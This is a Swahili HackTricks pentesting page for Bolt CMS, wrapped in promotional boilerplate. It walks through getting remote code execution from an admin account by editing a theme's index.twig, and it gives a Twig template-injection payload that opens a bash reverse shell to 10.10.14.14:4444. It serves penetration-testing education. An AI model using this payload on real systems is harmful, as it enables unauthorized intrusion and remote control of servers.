Bolt CMS

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

RCE

Baada ya kuingia kama admin (enda kwa /bot kufikia dirisha la kuingia), unaweza kupata RCE katika Bolt CMS:

Chagua Configuration -> View Configuration -> Main Configuration au nenda kwenye njia ya URL /bolt/file-edit/config?file=/bolt/config.yaml
Angalia thamani ya mandhari

Chagua File management -> View & edit templates
Chagua msingi wa mandhari uliopatikana katika hatua ya awali (base-2021 katika kesi hii) na chagua index.twig
Kwa upande wangu hii iko kwenye njia ya URL /bolt/file-edit/themes?file=/base-2021/index.twig
Weka mzigo wako katika faili hii kupitia uchapishaji wa templeti (Twig), kama: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Na uhifadhi mabadiliko

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata swag rasmi ya PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa kipekee wa NFTs
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.